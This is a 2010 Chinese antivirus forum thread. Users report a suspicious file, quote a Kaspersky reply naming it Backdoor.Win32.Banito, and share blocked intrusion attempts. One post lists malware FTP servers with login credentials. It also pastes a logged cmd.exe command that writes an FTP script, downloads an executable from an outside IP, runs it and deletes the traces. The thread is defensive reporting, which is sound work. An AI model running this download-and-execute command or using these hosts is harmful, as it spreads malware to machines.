近日发现个可疑文件。2010.11.29

s8706042

趋势未侦测到威胁~
已上报趋势~

幸福的猪猪

[KLAN-96349965]

您好，

此邮件由邮件自动处理系统生成。其中的报告即为来信附件中文件的分析结果，并将反映在下一次的病毒库升级中。此邮件将被转交给病毒分析师。

svchost.exe - Backdoor.Win32.Banito.cci

以上文件包含恶意代码，下次更新后即可查杀。感谢您的上报。

卡巴斯基中国病毒实验室

diannao6051

这些后门木马太可恶了 昨晚我关了端口策略  就拦截了2次 而且是拨号电脑才会出现
一个是ftp://myke.3322.org   用户名密码 liw  不过现在早上还登陆不上
另个是ftp://222.186.42.85   用户名"www     "   密码"123 "  <引号里面>  现在可以登陆下载xiaoji.exe

今天的
2010-11-30 10:28:49 应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\WINDOWS\system32\wbem\wmiprvse.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c echo open 123.53.64.149>%windir%\home.sys&echo 55555>>%windir%\home.sys&echo 5555555>>%windir%\home.sys&echo get 12.exe %windir%\lee.exe>>%windir%\home.sys&echo bye>>%windir%\home.sys&echo ftp -s:%windir%\home.sys>%windir%\vis.bat&echo %windir%\lee.exe>>%windir%\vis.bat&echo %windir%\lee.exe>>%windir%\vis.bat&echo %windir%\lee.exe>>%windir%\vis.bat&echo del %windir%\home.sys>>%windir%\vis.bat&echo del %windir%\vis.bat>>%windir%\vis.bat&cmd /c %windir%\vis.bat

hansyu

启发，to xandora(panda)